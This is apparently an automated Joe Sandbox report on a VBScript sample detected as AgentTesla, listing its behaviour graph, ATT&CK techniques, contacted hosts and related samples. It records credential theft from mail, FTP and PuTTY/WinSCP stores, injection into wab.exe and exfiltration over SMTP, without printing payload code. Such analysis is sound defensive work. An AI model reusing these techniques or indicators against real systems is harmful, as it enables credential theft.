            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5808, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3626677690.0000000021FAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5808, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts121
            Windows Management Instrumentation            		221
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		111
            Process Injection            		2
            Obfuscated Files or Information            		11
            Input Capture            		24
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter            		Logon Script (Windows)Logon Script (Windows)1
            Software Packing            		1
            Credentials in Registry            		1
            Query Registry            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS121
            Security Software Discovery            		Distributed Component Object Model11
            Input Capture            		2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets1
            Process Discovery            		SSH1
            Clipboard Data            		23
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
            Virtualization/Sandbox Evasion            		Cached Domain Credentials151
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            System Network Configuration Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430117 Sample: Swift_Message#1234323456.vbs Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 29 smtp.privateemail.com 2->29 31 drive.usercontent.google.com 2->31 33 2 other IPs or domains 2->33 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 4 other signatures 2->53 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 63 VBScript performs obfuscated calls to suspicious functions 9->63 65 Suspicious powershell command line found 9->65 67 Wscript starts Powershell (via cmd or directly) 9->67 69 3 other signatures 9->69 12 powershell.exe 14 19 9->12         started        process6 dnsIp7 39 drive.google.com 142.250.65.174, 443, 49715, 49723 GOOGLEUS United States 12->39 41 drive.usercontent.google.com 142.251.35.161, 443, 49716, 49724 GOOGLEUS United States 12->41 71 Suspicious powershell command line found 12->71 73 Very long command line found 12->73 75 Found suspicious powershell code related to unpacking or dynamic code loading 12->75 16 powershell.exe 17 12->16         started        19 conhost.exe 12->19         started        21 cmd.exe 1 12->21         started        signatures8 process9 signatures10 43 Writes to foreign memory regions 16->43 45 Found suspicious powershell code related to unpacking or dynamic code loading 16->45 23 wab.exe 15 8 16->23         started        27 cmd.exe 1 16->27         started        process11 dnsIp12 35 api.ipify.org 172.67.74.152, 443, 49725 CLOUDFLARENETUS United States 23->35 37 smtp.privateemail.com 66.29.159.53, 49726, 49727, 587 ADVANTAGECOMUS United States 23->37 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->55 57 Tries to steal Mail credentials (via file / registry access) 23->57 59 Tries to harvest and steal ftp login credentials 23->59 61 2 other signatures 23->61 signatures13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Swift_Message#1234323456.vbs5%ReversingLabsWin32.Dropper.Generic

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.65.174
            		truefalse
              		high
              drive.usercontent.google.com
              		142.251.35.161
              		truefalse
                		high
                api.ipify.org
                		172.67.74.152
                		truefalse
                  		high
                  smtp.privateemail.com
                  		66.29.159.53
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#wab.exe, 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3628322812.000000002418F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3626677690.000000002203B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2841439577.0000015930831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2677071576.0000000005EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://sectigo.com/CPS0wab.exe, 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3628322812.000000002418F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3626677690.000000002203B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2754801112.0000015920D05000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://ocsp.sectigo.com0wab.exe, 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3628322812.000000002418F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3626677690.000000002203B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2673826802.0000000004FA8000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          • URL Reputation: malware
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2673826802.0000000004FA8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000002.00000002.2754801112.0000015921D1A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000005.00000002.2677071576.0000000005EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000005.00000002.2677071576.0000000005EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://drive.googPpowershell.exe, 00000002.00000002.2754801112.00000159229C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://drive.usercontent.google.com/wab.exe, 0000000B.00000003.2671826187.0000000006486000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.0000000006482000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://drive.google.compowershell.exe, 00000002.00000002.2754801112.00000159229C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.ipify.org/twab.exe, 0000000B.00000002.3626677690.0000000021F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2673826802.0000000004FA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://smtp.privateemail.comwab.exe, 0000000B.00000002.3626677690.000000002203B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3626677690.0000000021FAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.compowershell.exe, 00000002.00000002.2754801112.00000159229E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159229C7000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.000000000646E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2659019233.0000000006488000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.ipify.orgwab.exe, 0000000B.00000002.3626677690.0000000021F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2673826802.0000000004E51000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.google.com/wab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/powershell.exe, 00000005.00000002.2677071576.0000000005EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2841439577.0000015930831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2677071576.0000000005EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.google.compowershell.exe, 00000002.00000002.2754801112.000001592280A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159209E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2754801112.0000015920D05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2754801112.00000159207C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://apis.google.compowershell.exe, 00000002.00000002.2754801112.00000159229E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159229C7000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.000000000646E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2659019233.0000000006488000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.google.com/jwab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2754801112.00000159207C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2673826802.0000000004E51000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3626677690.0000000021F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              142.251.35.161
                                                              		drive.usercontent.google.comUnited States
                                                              		15169GOOGLEUSfalse
                                                              142.250.65.174
                                                              		drive.google.comUnited States
                                                              		15169GOOGLEUSfalse
                                                              66.29.159.53
                                                              		smtp.privateemail.comUnited States
                                                              		19538ADVANTAGECOMUSfalse
                                                              172.67.74.152
                                                              		api.ipify.orgUnited States
                                                              		13335CLOUDFLARENETUSfalse

                                                              General Information

                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1430117
                                                              Start date and time:2024-04-23 07:52:12 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 8m 11s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:12
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:Swift_Message#1234323456.vbs
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.expl.evad.winVBS@12/7@4/4
                                                              EGA Information:
                                                              • Successful, ratio: 33.3%
                                                              HCA Information:
                                                              • Successful, ratio: 95%
                                                              • Number of executed functions: 118
                                                              • Number of non-executed functions: 4
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .vbs

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 3428 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 416 because it is empty
                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              07:53:26API Interceptor397x Sleep call for process: powershell.exe modified
                                                              07:54:06API Interceptor252940x Sleep call for process: wab.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              66.29.159.53e-dekont_swift-details.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                17129052285907bbffa1e06db9a2c2be9b124dbfe370dcce33488c29504b5286529b8a6aa8471.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                  Scan_IMG-Payment Sheet _Till Febuary 2024...bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                    1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                      1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                        https://www.wikiran.org/attachments/leaks/asbgroup//4d90f5a202dda02e5900334984637a7fd0d3b2e2/CIMB%20PAYMENT%200520.zipGet hashmaliciousAgentTeslaBrowse
                                                                          pAYMENTcOPY.com.exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                                            img.exeGet hashmaliciousAgentTeslaBrowse
                                                                              ORDER_4490_0003469.exeGet hashmaliciousAgentTeslaBrowse
                                                                                584961.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  172.67.74.152Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                                                                  • api.ipify.org/?format=json
                                                                                  Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                                                  • api.ipify.org/?format=json
                                                                                  Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                                                  • api.ipify.org/?format=json
                                                                                  Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                                                  • api.ipify.org/?format=json
                                                                                  Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                                                  • api.ipify.org/?format=json
                                                                                  SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                                                  • api.ipify.org/?format=json
                                                                                  SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                                                  • api.ipify.org/?format=json
                                                                                  Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                  • api.ipify.org/?format=json

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  smtp.privateemail.come-dekont_swift-details.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 66.29.159.53
                                                                                  17129052285907bbffa1e06db9a2c2be9b124dbfe370dcce33488c29504b5286529b8a6aa8471.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 66.29.159.53
                                                                                  Scan_IMG-Payment Sheet _Till Febuary 2024...bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 66.29.159.53
                                                                                  1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 66.29.159.53
                                                                                  1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 66.29.159.53
                                                                                  https://www.wikiran.org/attachments/leaks/asbgroup//4d90f5a202dda02e5900334984637a7fd0d3b2e2/CIMB%20PAYMENT%200520.zipGet hashmaliciousAgentTeslaBrowse
                                                                                  • 66.29.159.53
                                                                                  pAYMENTcOPY.com.exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                                                  • 66.29.159.53
                                                                                  img.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 66.29.159.53
                                                                                  ORDER_4490_0003469.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 66.29.159.53
                                                                                  584961.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 66.29.159.53
                                                                                  api.ipify.orgQUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.74.152
                                                                                  https://florideskser.online/loginGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.74.152
                                                                                  CE1KVxYp5t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                  • 172.67.74.152
                                                                                  Ve6VeFSgkz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                  • 104.26.13.205
                                                                                  z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.13.205
                                                                                  https://www.wsj.pm/download.phpGet hashmaliciousNetSupport RATBrowse
                                                                                  • 104.26.12.205
                                                                                  doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.74.152
                                                                                  Alumium.exeGet hashmaliciousGuLoaderBrowse
                                                                                  • 172.67.74.152
                                                                                  SecuriteInfo.com.Win32.PWSX-gen.27836.29335.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 104.26.13.205
                                                                                  AWB NO. 077-57676135.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.74.152

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  ADVANTAGECOMUSm2 Cotizaci#U00f3n-1634.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • 66.29.135.159
                                                                                  Receipt_681002.exeGet hashmaliciousAgentTesla, AsyncRAT, PureLog StealerBrowse
                                                                                  • 66.29.151.236
                                                                                  e-dekont_swift-details.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 66.29.159.53
                                                                                  Receipt_7814002.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  • 66.29.151.236
                                                                                  IMG_210112052.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  • 66.29.151.236
                                                                                  Receipt_032114005.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  • 66.29.151.236
                                                                                  SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                  • 66.29.149.46
                                                                                  zHsIxYcmJV.msiGet hashmaliciousUnknownBrowse
                                                                                  • 66.29.152.245
                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                  • 66.29.149.46
                                                                                  DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                  • 66.29.149.46
                                                                                  CLOUDFLARENETUSPurchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.215.45
                                                                                  ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 172.67.134.136
                                                                                  https://universewild.orgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                  • 104.17.2.184
                                                                                  https://url.avanan.click/v2/___https:/novafr-my.sharepoint.com/:b:/g/personal/mfranco_nova-fr_org/EZPaIwPkDApNno6rWIAO20YB4ByiRCAe_VGScx-2iiONBw?e=magUuY/___.YXAzOmVuLW1kYTphOm86ZDA4MDI5MGVhZTA1MzJiMWZlYTg0YjE1OWE2NmVhNjc6NjplYTNkOjc2NzNkYWE0NTMzNWVhMjkxM2VjMGU1NGMyNDY3ZjVhNmJhNjU0MTk1ZmRjMzUzM2QxODAyNDVjY2E1Y2M1ODY6aDpUGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.17.2.184
                                                                                  http://myidealwedding.com.auGet hashmaliciousBitRAT, HTMLPhisherBrowse
                                                                                  • 104.17.25.14
                                                                                  QUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 172.67.74.152
                                                                                  https://netorg64799-my.sharepoint.com/:b:/g/personal/alva_wct-usa_com/ES73RZgSrIxGsn3-WRolkh4BarUkUa8B7jWUjl7sJYhzog?e=uQClH3Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                  • 104.17.2.184
                                                                                  szamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                                                                  • 104.17.24.14
                                                                                  https://pub-187b2d91c0494f3ba5ec3b326cc8fed8.r2.dev/baeleavemail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.18.2.35
                                                                                  szamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                                                                  • 104.17.25.14

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0ePurchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 142.251.35.161
                                                                                  • 142.250.65.174
                                                                                  • 172.67.74.152
                                                                                  Shipping Document_PDF.vbsGet hashmaliciousUnknownBrowse
                                                                                  • 142.251.35.161
                                                                                  • 142.250.65.174
                                                                                  • 172.67.74.152
                                                                                  BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                  • 142.251.35.161
                                                                                  • 142.250.65.174
                                                                                  • 172.67.74.152
                                                                                  BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                  • 142.251.35.161
                                                                                  • 142.250.65.174
                                                                                  • 172.67.74.152
                                                                                  QUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 142.251.35.161
                                                                                  • 142.250.65.174
                                                                                  • 172.67.74.152
                                                                                  scripttodo.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 142.251.35.161
                                                                                  • 142.250.65.174
                                                                                  • 172.67.74.152
                                                                                  https://secure.rightsignature.com/signers/72685de1-0891-4676-ba51-0639e8aac386/sign?identity_token=e9BkbAE3-a65UvyeRkxLGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 142.251.35.161
                                                                                  • 142.250.65.174
                                                                                  • 172.67.74.152
                                                                                  FreeTemplates_46070101.msiGet hashmaliciousUnknownBrowse
                                                                                  • 142.251.35.161
                                                                                  • 142.250.65.174
                                                                                  • 172.67.74.152
                                                                                  z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 142.251.35.161
                                                                                  • 142.250.65.174
                                                                                  • 172.67.74.152
                                                                                  rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 142.251.35.161
                                                                                  • 142.250.65.174
                                                                                  • 172.67.74.152
                                                                                  37f463bf4616ecd445d4a1937da06e19Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 142.250.65.174
                                                                                  • 142.251.35.161
                                                                                  232_786.msiGet hashmaliciousUnknownBrowse
                                                                                  • 142.250.65.174
                                                                                  • 142.251.35.161
                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                  • 142.250.65.174
                                                                                  • 142.251.35.161
                                                                                  file.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                  • 142.250.65.174
                                                                                  • 142.251.35.161
                                                                                  FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                  • 142.250.65.174
                                                                                  • 142.251.35.161
                                                                                  CE1KVxYp5t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                  • 142.250.65.174
                                                                                  • 142.251.35.161
                                                                                  Ve6VeFSgkz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                  • 142.250.65.174
                                                                                  • 142.251.35.161
                                                                                  FreeTemplates_46070101.msiGet hashmaliciousUnknownBrowse
                                                                                  • 142.250.65.174
                                                                                  • 142.251.35.161
                                                                                  rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 142.250.65.174
                                                                                  • 142.251.35.161
                                                                                  FreeTemplates_46069972.msiGet hashmaliciousUnknownBrowse
                                                                                  • 142.250.65.174
                                                                                  • 142.251.35.161

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):11608
                                                                                  Entropy (8bit):4.886255615007755
                                                                                  Encrypted:false
